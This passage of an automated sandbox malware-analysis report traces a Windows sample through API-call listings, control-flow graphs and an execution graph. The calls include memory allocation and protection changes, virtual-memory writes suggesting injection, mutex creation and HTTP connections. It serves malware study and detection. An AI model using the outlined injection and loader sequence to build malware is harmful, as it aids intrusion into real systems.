          APIs
            • Part of subcall function 007C05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,007C0093), ref: 007C05CA
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 007C00B3
          • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 007C00C3
          • VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 007C010C
          • VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 007C0122
          • VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 007C0187
          Memory Dump Source
          • Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: Virtual$Protect$AllocFree
          • String ID:
          • API String ID: 3729553426-0
          • Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction ID: 48af2377bb5948aea519b5e428d4869a08d4101c8b87b12b0c6b905ecf04df9c
          • Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction Fuzzy Hash: 1D419E72200114EFDB14EF68D889FAAB7A9FF84724B25451DF9059B212C779EC52CBE0
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10001958
          • NtWriteVirtualMemory.NTDLL ref: 100019AF
          • NtFreeVirtualMemory.NTDLL ref: 100019F2
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$AllocateFreeWrite
          • String ID:
          • API String ID: 2213553877-0
          • Opcode ID: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
          • Instruction ID: 4be20192d114f57ed866d6a02c79e9e60545017e345fbc303b6d3b3f1d5ba602
          • Opcode Fuzzy Hash: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
          • Instruction Fuzzy Hash: 3A213872705B8082EB11CF65E85478A77A8F789BD5F584029DF8C87B68DF39C58ACB40
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
          • Instruction ID: bc3fb0688c431488aa2819edea9e73b974ef83373d57799a2a78b4a70b7274a1
          • Opcode Fuzzy Hash: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
          • Instruction Fuzzy Hash: D5117026304F8182EB11DB24E89139E23A0FB997D4F100024FE8D8736DEF6CC999C750
          APIs
          • NtWriteVirtualMemory.NTDLL ref: 100017EE
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtualWrite
          • String ID:
          • API String ID: 3527976591-0
          • Opcode ID: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
          • Instruction ID: 85a4ee6809ba2549589f64f9e1a2927fba021b9ffec7882c337938f7ba2d8dd0
          • Opcode Fuzzy Hash: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
          • Instruction Fuzzy Hash: 7BE03072714B8086D7408F1AF58064AB3A8F7887C4F848135FB9D83B18EF78C5A5CB04
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10001858
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
          • Instruction ID: 4d70551202633f4cf27d5d93aec4b253003e6b1c8e1263e06443463bb6e67a25
          • Opcode Fuzzy Hash: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
          • Instruction Fuzzy Hash: 31E0C976A18780C6D710DF28E48074ABBB4F79A798FA04015EB8C82A28DB7DC155CF00
          APIs
          • NtProtectVirtualMemory.NTDLL ref: 100018EA
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryProtectVirtual
          • String ID:
          • API String ID: 2706961497-0
          • Opcode ID: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
          • Instruction ID: 358533fb2e128c2901d80c4f4a4cfb589ac24ede55e7f2f42334dbb3c0a8b6ed
          • Opcode Fuzzy Hash: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
          • Instruction Fuzzy Hash: 44E0E5B2A24B858ADB01DF54E84078AB7A4F784798F801015E6CC83B28EB7DC25ACB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 41 7c01c0-7c01ce 42 7c01d0 41->42 43 7c0243-7c0244 41->43 44 7c01d2-7c01d7 42->44 44->43 45 7c01d9-7c01e1 44->45 47 7c01e7-7c01ee 45->47 48 7c01e3 45->48 49 7c01f0-7c01f3 47->49 48->47 49->49 50 7c01f5-7c0209 VirtualProtect 49->50 51 7c020e-7c0211 50->51 52 7c020b 50->52 53 7c0212-7c0215 51->53 52->51 54 7c0217-7c021c 53->54 55 7c0232-7c0241 VirtualProtect 53->55 56 7c021e 54->56 57 7c0222-7c0230 54->57 55->44 56->57 57->53
          APIs
          • VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 007C0201
          • VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 007C023A
          Memory Dump Source
          • Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction ID: dabaced31705c96dc6f0a04d0252672024b71e9b7cabf701c7d1bea4a8cc8430
          • Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction Fuzzy Hash: 02118872500224ABEB314E59CC48FBBB7ACEF81B20B19461DFD1AE7204D629ED0586E1

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 007B0065
          Memory Dump Source
          • Source File: 00000003.00000002.2122091864.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7b0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction ID: 4fdc2b0ea71fc8425d7cbef45217d0808fa653986713f2b9317f16b6af58a4c0
          • Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction Fuzzy Hash: A1012B75940308BFD7102F70CC08FCF3BA9AFC8720F414515F99AA7281DD7C98808A94

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 76 7c05bd-7c05cf VirtualAlloc
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,007C0093), ref: 007C05CA
          Memory Dump Source
          • Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
          • Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$CloseObjectReadSignalSingleWait$Write
          • String ID: H$H$H
          • API String ID: 2084818639-1989617792
          • Opcode ID: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
          • Instruction ID: d3cf83964699c326543a64d7e9576905f73cd3ca186e7bac4399ed8c9f110ffe
          • Opcode Fuzzy Hash: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
          • Instruction Fuzzy Hash: 23412772604B8186EB60CF66F4907AE73A8FB89BC9F515126DE8D43A1CDF35C499CB40

          Execution Graph

          Execution Coverage:3.3%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:8.5%
          Total number of Nodes:1552
          Total number of Limit Nodes:28
          execution_graph 8072 140017db4 __wgetmainargs 8073 140017e00 GetStartupInfoW 8074 140017e39 8073->8074 8075 140017e4b 8074->8075 8077 140017e53 Sleep 8074->8077 8076 140017e6b _amsg_exit 8075->8076 8080 140017e75 8075->8080 8076->8080 8077->8074 8078 140017ee7 _initterm 8081 140017f04 8078->8081 8079 140017ec8 8080->8078 8080->8079 8080->8081 8081->8079 8087 140002900 8081->8087 8083 140017faa 8084 140017fb8 exit 8083->8084 8085 140017fc0 8083->8085 8084->8085 8085->8079 8086 140017fc8 _cexit 8085->8086 8086->8079 8088 140002916 8087->8088 8174 14000e2b0 ??2@YAPEAX_K 8088->8174 8092 1400029b8 CoInitializeSecurity 8095 1400029f0 8092->8095 8171 140002a5f 8092->8171 8093 140003793 8096 1400037af FreeLibrary 8093->8096 8097 1400037c0 CoUninitialize 8093->8097 8094 140003628 8704 14000bd60 8094->8704 8183 14000c3f0 8095->8183 8096->8097 8097->8083 8100 1400029f5 CoCreateInstance 8224 1400175a0 8100->8224 8107 140002aa2 8235 140001080 8107->8235 8108 140002aa9 8297 140001c20 8108->8297 8112 14000377e HeapFree 8112->8093 8113 140002aa7 8113->8171 8313 1400075c0 8113->8313 8116 140002b13 8334 14000e0c0 8116->8334 8119 140002bd7 8350 140004e20 ??2@YAPEAX_K 8119->8350 8122 140002be5 8123 140002be9 8122->8123 8124 140002c36 HeapFree 8122->8124 8125 140002c48 8122->8125 8126 140002c0e 8123->8126 8129 140002bfc HeapFree 8123->8129 8124->8125 8415 14000caf0 8125->8415 8383 140007740 8126->8383 8129->8126 8130 140002c50 8130->8123 8131 140002c58 8130->8131 8422 1400164d0 8131->8422 8137 140002d3f _time64 8151 140002cc7 8137->8151 8139 140002d83 Sleep 8140 140004120 33 API calls 8139->8140 8142 140002da0 8140->8142 8141 140002e03 ??2@YAPEAX_K 8141->8151 8142->8151 8143 140002f19 HeapFree 8143->8151 8145 140002f30 Sleep 8145->8142 8145->8151 8148 140002e89 HeapFree 8148->8151 8149 140002ea2 _time64 8149->8151 8151->8083 8151->8137 8151->8139 8151->8141 8151->8143 8151->8145 8151->8148 8151->8149 8153 140002f02 ??3@YAXPEAX 8151->8153 8155 14000e0c0 memset memcpy 8151->8155 8156 140003210 _time64 8151->8156 8160 140003575 HeapFree 8151->8160 8162 14000caf0 11 API calls 8151->8162 8163 14000359b 8151->8163 8169 1400034b4 _wtoi 8151->8169 8172 14000343b HeapFree 8151->8172 8173 140003450 _time64 8151->8173 8437 14000a3d0 8151->8437 8473 14000a230 8151->8473 8490 14000d5a0 8151->8490 8497 140004120 8151->8497 8512 140002660 8151->8512 8535 140002440 8151->8535 8545 1400042f0 8151->8545 8549 14000b420 8151->8549 8557 140005460 8151->8557 8577 140006bf0 WSAStartup 8151->8577 8583 1400043f0 8151->8583 8615 140004c00 8151->8615 8635 140005800 WSAStartup 8151->8635 8655 140015190 8151->8655 8668 140007be0 8151->8668 8683 140003ed0 8151->8683 8153->8151 8155->8151 8156->8151 8160->8151 8162->8151 8164 1400035c0 8163->8164 8166 1400035ae HeapFree 8163->8166 8167 140007740 43 API calls 8164->8167 8166->8164 8167->8171 8168 14000348f _wtoi 8168->8151 8168->8169 8169->8151 8171->8093 8171->8094 8172->8173 8173->8151 8175 14000e2e5 memset 8174->8175 8176 14000e2fe 8174->8176 8175->8176 8177 14000e0c0 2 API calls 8176->8177 8178 14000e366 LoadLibraryExW 8176->8178 8180 140002935 SetCurrentDirectoryW GetTickCount srand CoInitializeEx 8176->8180 8177->8176 8178->8176 8179 14000e38c 8178->8179 8181 14000e0c0 2 API calls 8179->8181 8180->8092 8180->8171 8182 14000e3b0 GetProcAddress 8181->8182 8182->8176 8182->8179 8184 14000c428 8183->8184 8185 14000e0c0 2 API calls 8184->8185 8189 14000c6f5 8184->8189 8186 14000c440 LoadLibraryExW 8185->8186 8188 14000c483 8186->8188 8186->8189 8190 14000e0c0 2 API calls 8188->8190 8189->8100 8191 14000c493 LoadLibraryExW 8190->8191 8191->8189 8193 14000c4e3 8191->8193 8194 14000e0c0 2 API calls 8193->8194 8195 14000c4f4 GetProcAddress 8194->8195 8195->8189 8196 14000c516 8195->8196 8197 14000e0c0 2 API calls 8196->8197 8198 14000c527 GetProcAddress 8197->8198 8198->8189 8199 14000c549 8198->8199 8200 14000e0c0 2 API calls 8199->8200 8201 14000c55a GetProcAddress 8200->8201 8201->8189 8202 14000c57c 8201->8202 8203 14000e0c0 2 API calls 8202->8203 8204 14000c58d GetProcAddress 8203->8204 8204->8189 8205 14000c5af 8204->8205 8206 14000e0c0 2 API calls 8205->8206 8207 14000c5c0 GetProcAddress 8206->8207 8207->8189 8208 14000c5e2 8207->8208 8209 14000e0c0 2 API calls 8208->8209 8210 14000c5f3 GetProcAddress 8209->8210 8210->8189 8211 14000c615 8210->8211 8212 14000e0c0 2 API calls 8211->8212 8213 14000c626 GetProcAddress 8212->8213 8213->8189 8214 14000c648 8213->8214 8215 14000e0c0 2 API calls 8214->8215 8216 14000c659 GetProcAddress 8215->8216 8216->8189 8217 14000c677 8216->8217 8218 14000e0c0 2 API calls 8217->8218 8219 14000c688 GetProcAddress 8218->8219 8219->8189 8220 14000c6a6 8219->8220 8221 14000e0c0 2 API calls 8220->8221 8222 14000c6b7 GetProcAddress 8221->8222 8222->8189 8223 14000c6d5 8222->8223 8223->8100 8225 14000e0c0 2 API calls 8224->8225 8226 1400175cf ConvertStringSecurityDescriptorToSecurityDescriptorW 8225->8226 8228 14001762e 8226->8228 8229 14000e0c0 2 API calls 8228->8229 8230 140017670 CreateMutexExW 8229->8230 8232 1400176d3 8230->8232 8233 140002a5b 8232->8233 8234 1400176e5 exit 8232->8234 8233->8107 8233->8108 8233->8171 8234->8233 8236 140001133 8235->8236 8237 14000113f ??2@YAPEAX_K 8236->8237 8239 14000169b 8236->8239 8238 140001154 SysAllocString 8237->8238 8258 140001700 8237->8258 8242 140001174 8238->8242 8240 1400016d6 HeapFree 8239->8240 8241 1400016e9 8239->8241 8240->8241 8241->8113 8243 1400011cb 8242->8243 8244 1400011b3 8242->8244 8245 1400011ad SysFreeString 8242->8245 8243->8239 8745 140001730 8243->8745 8247 1400011c2 ??3@YAXPEAX 8244->8247 8248 1400011bc ??_V@YAXPEAX 8244->8248 8245->8244 8247->8243 8248->8247 8250 14000e0c0 2 API calls 8251 1400011ff 8250->8251 8252 14000e0c0 2 API calls 8251->8252 8253 14000124c VariantInit VariantInit SysAllocString 8252->8253 8255 1400012f5 ??2@YAPEAX_K 8253->8255 8256 1400012ea 8253->8256 8257 140001325 SysAllocString 8255->8257 8255->8258 8256->8255 8259 140001358 ??2@YAPEAX_K 8257->8259 8261 140001348 8257->8261 8259->8258 8260 140001372 SysAllocString 8259->8260 8262 140001392 8260->8262 8261->8259 8263 140001426 8262->8263 8264 140001408 SysFreeString 8262->8264 8265 14000140e 8262->8265 8266 140001458 VariantClear VariantClear VariantClear 8263->8266 8269 14000143a SysFreeString 8263->8269 8270 140001440 8263->8270 8264->8265 8267 140001417 ??_V@YAXPEAX 8265->8267 8268 14000141d ??3@YAXPEAX 8265->8268 8271 140001480 8266->8271 8283 14000168b 8266->8283 8267->8268 8268->8263 8269->8270 8273 140001449 ??_V@YAXPEAX 8270->8273 8274 14000144f ??3@YAXPEAX 8270->8274 8271->8239 8275 140001730 25 API calls 8271->8275 8273->8274 8274->8266 8276 14000149b 8275->8276 8276->8239 8277 14000e0c0 2 API calls 8276->8277 8278 1400014b6 VariantInit VariantInit VariantInit 8277->8278 8787 140001000 ??2@YAPEAX_K 8278->8787 8281 140001554 ??2@YAPEAX_K 8281->8283 8284 14000157b SysAllocString 8281->8284 8784 14000cc50 GetCurrentProcess OpenProcessToken 8283->8784 8285 14000159b 8284->8285 8286 140001608 SysFreeString 8285->8286 8287 14000160e 8285->8287 8292 140001626 8285->8292 8286->8287 8289 140001617 ??_V@YAXPEAX 8287->8289 8290 14000161d ??3@YAXPEAX 8287->8290 8288 14000166b VariantClear VariantClear VariantClear 8288->8239 8289->8290 8290->8292 8291 140001666 8291->8288 8292->8288 8292->8291 8293 140001648 SysFreeString 8292->8293 8294 14000164e 8292->8294 8293->8294 8295 140001657 ??_V@YAXPEAX 8294->8295 8296 14000165d ??3@YAXPEAX 8294->8296 8295->8296 8296->8291 8298 14000e0c0 2 API calls 8297->8298 8300 140001c69 8298->8300 8299 140001cc5 8299->8113 8300->8299 8301 14000bd60 18 API calls 8300->8301 8302 140001ce5 8301->8302 8303 14000e580 10 API calls 8302->8303 8304 140001e26 8302->8304 8309 140001d09 8303->8309 8305 140001f24 8304->8305 8306 140001f0f HeapFree 8304->8306 8307 140001f29 HeapFree 8305->8307 8308 140001f3e 8305->8308 8306->8305 8307->8308 8308->8113 8309->8304 8310 14000e0c0 2 API calls 8309->8310 8311 140001d57 8310->8311 8311->8304 8312 140001dc7 memset 8311->8312 8312->8304 8798 14000d420 8313->8798 8316 14000e0c0 2 API calls 8317 140007646 8316->8317 8318 14000e580 10 API calls 8317->8318 8319 140007651 8318->8319 8803 14000c0c0 8319->8803 8321 140007684 ??2@YAPEAX_K 8322 1400076a0 8321->8322 8323 140007698 8321->8323 8325 14000a3d0 25 API calls 8322->8325 8826 140014e00 8323->8826 8326 1400076cd _time64 8325->8326 8327 1400076e4 8326->8327 8328 140002af0 ??2@YAPEAX_K 8326->8328 8329 1400076ed HeapFree 8327->8329 8330 1400076ff 8327->8330 8328->8116 8329->8330 8829 14000dc30 8330->8829 8333 14000770d _time64 8333->8328 8336 14000e0dd 8334->8336 8335 140002b38 8335->8119 8340 14000e410 8335->8340 8336->8335 8337 14000e1e1 memset 8336->8337 8339 14000e1f7 8336->8339 8337->8339 8338 14000e27a memcpy 8338->8335 8339->8335 8339->8338 8341 14000e44f 8340->8341 8342 14000e526 8341->8342 8343 14000e0c0 2 API calls 8341->8343 8342->8119 8344 14000e46b 8343->8344 8344->8342 8345 14000e4ec HeapFree 8344->8345 8346 14000e4fe 8344->8346 8345->8346 8347 14000e580 10 API calls 8346->8347 8348 14000e508 8347->8348 8348->8342 8349 14000e510 memcpy 8348->8349 8349->8342 8351 140004e59 8350->8351 8352 140004e8d ??2@YAPEAX_K 8351->8352 8353 140004ea0 8352->8353 8354 14000e0c0 2 API calls 8353->8354 8355 140004ee5 8354->8355 8897 140002500 8355->8897 8358 140004f6f 8360 140004f77 HeapFree 8358->8360 8361 140004f8c 8358->8361 8359 140002440 14 API calls 8359->8358 8360->8361 8362 140004fa7 8361->8362 8905 140005d00 8361->8905 8363 14000e0c0 2 API calls 8362->8363 8368 140004fbe 8363->8368 8366 140005067 8370 14000507c 8366->8370 8371 140005092 8366->8371 8367 140005d00 10 API calls 8369 14000505e ??3@YAXPEAX 8367->8369 8379 14000504d 8368->8379 8920 1400023b0 8368->8920 8369->8366 8372 1400050b5 8370->8372 8373 140005d00 10 API calls 8370->8373 8371->8372 8374 140005d00 10 API calls 8371->8374 8382 140005131 8371->8382 8927 1400051b0 8372->8927 8376 14000508d ??3@YAXPEAX 8373->8376 8374->8376 8376->8372 8379->8366 8379->8367 8380 14000e0c0 2 API calls 8380->8382 8382->8122 8384 140007756 HeapFree 8383->8384 8385 140007768 8383->8385 8384->8385 8386 140007771 HeapFree 8385->8386 8387 140007783 8385->8387 8386->8387 8388 14000778c HeapFree 8387->8388 8389 14000779e 8387->8389 8388->8389 8390 1400077a7 HeapFree 8389->8390 8391 1400077b9 8389->8391 8390->8391 8392 1400077c2 HeapFree 8391->8392 8393 1400077d4 8391->8393 8392->8393 8394 1400077dd HeapFree 8393->8394 8395 1400077ef 8393->8395 8394->8395 8960 14000b390 8395->8960 8416 14000cafe 8415->8416 8417 14000cbc2 8416->8417 8418 14000e580 10 API calls 8416->8418 8417->8130 8419 14000cb6e 8418->8419 8420 14000cb88 8419->8420 8421 14000cb9b HeapFree 8419->8421 8420->8130 8421->8420 8423 14000e0c0 2 API calls 8422->8423 8424 140016501 8423->8424 8966 14000d0f0 8424->8966 8426 140002c81 _time64 8426->8151 8427 1400165a0 ??2@YAPEAX_K 8435 14001654c 8427->8435 8428 140016664 HeapFree 8428->8426 8429 14001655b 8429->8426 8429->8428 8431 14001664e HeapFree 8429->8431 8431->8429 8435->8427 8435->8429 8979 14000f120 8435->8979 8988 140016690 8435->8988 9002 1400163e0 8435->9002 9006 14000ef60 8435->9006 8438 14000a41c 8437->8438 8439 14000a425 HeapFree 8438->8439 8440 14000a439 8438->8440 8439->8440 8441 14000e0c0 2 API calls 8440->8441 8447 14000a449 8441->8447 8442 14000a50e 8443 14000bd60 18 API calls 8442->8443 8452 14000a69e 8442->8452 8453 14000a5af 8443->8453 8444 14000a6c4 8444->8151 8445 14000a6af HeapFree 8445->8444 8446 14000a5eb 8448 14000e580 10 API calls 8446->8448 8446->8452 8447->8442 8449 14000e580 10 API calls 8447->8449 8450 14000a602 8448->8450 8451 14000a51e 8449->8451 8450->8452 8454 14000a642 8450->8454 8455 14000a6de 8450->8455 8451->8442 8457 14000a558 HeapFree 8451->8457 8452->8444 8452->8445 8453->8446 8456 14000ce20 11 API calls 8453->8456 8458 14000e580 10 API calls 8454->8458 8459 14000e580 10 API calls 8455->8459 8456->8446 8457->8442 8460 14000a647 8458->8460 8459->8460 8460->8452 8461 14000e0c0 2 API calls 8460->8461 8462 14000a707 8461->8462 8463 140002880 _vsnwprintf 8462->8463 8464 14000a76a 8463->8464 8465 14000a8c4 8464->8465 8468 14000a7d9 8464->8468 8465->8452 8466 14000a8c9 HeapFree 8465->8466 8466->8452 8467 14000a7e4 rand 8467->8468 8468->8467 8469 14000a83a 8468->8469 8470 14000e580 10 API calls 8469->8470 8471 14000a859 8470->8471 8471->8452 8472 14000e0c0 2 API calls 8471->8472 8472->8452 8474 14000a258 HeapFree 8473->8474 8475 14000a270 8473->8475 8474->8475 8476 14000e580 10 API calls 8475->8476 8477 14000a279 8476->8477 8478 14000a3bb 8477->8478 8479 14000a2ab 8477->8479 8480 14000e580 10 API calls 8477->8480 8478->8151 8479->8478 9378 140006fb0 8479->9378 8480->8479 8483 14000a2f0 8483->8151 8484 14000e580 10 API calls 8486 14000a30c 8484->8486 8485 140002880 _vsnwprintf 8485->8486 8486->8483 8486->8485 8487 14000a36b 8486->8487 8488 14000a391 HeapFree 8487->8488 8489 14000a3a6 HeapFree 8487->8489 8488->8489 8489->8478 8491 14000d5c2 WinHttpCloseHandle 8490->8491 8492 14000d5d0 WinHttpConnect 8490->8492 8491->8492 8493 14000d5f7 8492->8493 8494 14000d61c 8492->8494 8495 14000caf0 11 API calls 8493->8495 8494->8151 8496 14000d603 8495->8496 8496->8151 8498 14000e0c0 2 API calls 8497->8498 8499 14000415d 8498->8499 8500 140004176 8499->8500 8502 1400041df ??2@YAPEAX_K 8499->8502 8509 140004245 8499->8509 8500->8151 8501 140004280 HeapFree 8501->8500 8503 1400041f2 8502->8503 8504 1400023b0 28 API calls 8503->8504 8505 140004224 8504->8505 8506 140004228 _time64 8505->8506 8507 14000424f 8505->8507 8506->8507 8508 140004238 8506->8508 8507->8509 8510 14000426d ??3@YAXPEAX 8507->8510 8508->8509 9386 1400042b0 8508->9386 8509->8500 8509->8501 8510->8509 8513 1400027f1 8512->8513 8514 14000269c 8512->8514 8513->8151 9389 140007230 8514->9389 8517 140007230 14 API calls 8522 1400026c7 8517->8522 8518 1400027a6 HeapFree 8519 1400027bd 8518->8519 8520 1400027c2 HeapFree 8519->8520 8521 1400027d7 8519->8521 8520->8521 8521->8513 8523 1400027dc HeapFree 8521->8523 8532 14000274e 8522->8532 9397 140007340 8522->9397 8523->8513 8528 140002763 8531 14000e580 10 API calls 8528->8531 8529 140002738 9419 140007530 8529->9419 8533 14000276c 8531->8533 8532->8518 8532->8519 8533->8532 8534 14000277f memcpy 8533->8534 8534->8532 8536 140002466 8535->8536 8537 1400024f0 8535->8537 8538 14000bf10 11 API calls 8536->8538 8537->8151 8539 14000247b 8538->8539 8540 1400024cc 8539->8540 8541 14000247f SysAllocString 8539->8541 8540->8537 8542 1400024d9 HeapFree 8540->8542 8541->8540 8543 140002497 SysFreeString 8541->8543 8542->8537 8543->8540 8546 14000b420 3 API calls 8545->8546 8547 140004308 ??3@YAXPEAX 8546->8547 8547->8151 8550 14000b438 8549->8550 8551 14000b46a 8549->8551 8550->8551 8554 14000b44d HeapFree 8550->8554 8552 14000b47d HeapFree 8551->8552 8553 14000b48f 8551->8553 8552->8553 8555 14000b49d HeapFree 8553->8555 8556 14000b4af 8553->8556 8554->8550 8555->8556 8556->8151 8558 140005767 8557->8558 8573 1400054a1 8557->8573 8559 14000579a HeapFree 8558->8559 8560 1400057af 8558->8560 8559->8560 8561 1400057e3 8560->8561 8564 1400057c5 SysFreeString 8560->8564 8565 1400057cb 